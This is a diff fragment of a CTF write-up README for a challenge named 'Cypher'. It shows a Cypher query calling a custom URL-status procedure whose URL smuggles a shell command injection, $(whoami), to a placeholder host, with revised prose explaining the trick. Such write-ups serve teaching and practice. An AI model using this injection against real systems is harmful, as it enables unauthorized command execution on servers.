aut0mateEverything/CTF-writeups/Cypher/README.md

 CALL custom.getUrlStatusCode("http://ip:port/?c=$(whoami)")
 ```

-This payload uses custom function that tries to return a status code, but also executes command given at the end.
+This payload leverages a custom function to retrieve the HTTP status code from a specified URL.
+However, it also includes a command injection ($(whoami)) at the end of the URL, which attempts to execute a system command on the server.

 ### How to use?